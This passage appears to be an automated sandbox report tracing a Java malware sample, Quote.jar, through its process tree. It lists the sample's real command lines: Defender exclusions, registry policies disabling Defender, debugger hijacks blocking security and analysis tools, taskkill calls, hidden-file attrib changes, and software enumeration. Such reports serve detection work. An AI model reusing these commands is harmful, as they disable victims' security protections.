2460 wrote to memory of 3960 2460 java.exe 354 PID 2460 wrote to memory of 3960 2460 java.exe 354 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1784 attrib.exe 2464 attrib.exe 804 attrib.exe 856 attrib.exe 1232 attrib.exe 1272 attrib.exe 1528 attrib.exe 1664 attrib.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\Quote.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2976
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:500
-
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:804
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:856
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\FVKwo\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1232
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\FVKwo\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1272
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:1528
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:1664
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:1784
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +s +r C:\Users\Admin\FVKwo\WbZqr.class2⤵
- Views/modifies file attributes
PID:2464
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1668
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:2184
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\FVKwo','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\FVKwo\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2536
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1940
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:3716
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2520
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2668
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2364
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:640
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:500
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1608
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1808
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1772
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2540
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:732
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2064
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1712
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:996
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:2456
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3660
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2996
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:804
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2052
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:744
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3584
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:800
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:643⤵PID:1940
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:323⤵PID:2252
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:2176
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1296
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1116
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:3008
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1692
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:804
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:568
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:2772
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3224
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1940
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1416
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1896
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:548
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:3168
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:668
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:3112
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:504
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3660
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:3632
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1720
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3888
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:3336
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:2912
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2684
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:3584
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1028
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2904
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:3696
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:784
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1156
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1552
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:3112
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:2508
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:952
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:2116
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:1188
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2912
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:2720
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:3716
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:2972
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1896
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1112
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:3456
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:1224
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:3780
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:800
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:2780
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:3880
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:643⤵PID:1228
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:323⤵PID:3004
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1848
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:2552
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:2056
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2720
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:1116
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:2096
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3164
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:3740
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:3376
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2448
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:536
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:3112
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:2060
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:488
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:2360
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:3224
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1448
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:643⤵PID:1000
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:323⤵PID:3008
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2464
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:2972
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:3632
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:732
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:2360
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:3720
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:784
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:404
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:3720
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:3424
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1028
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:643⤵PID:3880
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:323⤵PID:352
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:668
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3532
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:643⤵PID:1996
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:323⤵PID:2520
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1448
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:643⤵PID:844
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:323⤵PID:2464
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3164
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:643⤵PID:504
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:323⤵PID:2688
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3960
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:2052
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:688
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:3368
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:3376
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1296
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3432
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:352
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2536
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:3660
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:2508
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2456
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:844
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1116
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1940
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:2996
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:688
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:2060
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1432
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1428
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:636
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:2716
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1004
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:1664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:3728
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3660
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:2464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:1264
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2052
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:688
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:3988
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3756
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:643⤵PID:1896
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:323⤵PID:3704
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1520
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:643⤵PID:2508
-
-
